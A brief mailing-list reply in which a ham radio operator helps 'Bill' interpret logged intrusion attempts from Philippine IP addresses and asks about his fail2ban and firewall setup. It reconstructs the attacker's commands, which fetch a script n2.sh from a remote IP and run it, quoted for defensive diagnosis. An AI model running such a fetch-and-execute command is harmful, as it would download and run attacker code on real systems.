15 Jun
2016
15 Jun
'16
11:26 a.m.
Bill,
First, I noticed:
- All the source IP addresses are allocated to ISPs in the Philippines - Piecing the information together, I get something more like:
# get 46.183.217.145 -c n2.sh # n2.sh -g 185.103.109<THIS OCTET IS MISSING FROM THE COMMENTS> # echo -e 'teot'
CHECK THAT YOU DO NOT FIND A FILE NAMED n2.sh ON YOUR SYSTEM!?!?
I surmise the malicious person is:
- attempting to run 'get' and other commands on your local host; - and/or trying to send commands through your host - to a 3rd compromised system
When did you begin running fail2ban and firewalls, for a while, or recently?
73,
- Lynwood KB3VWG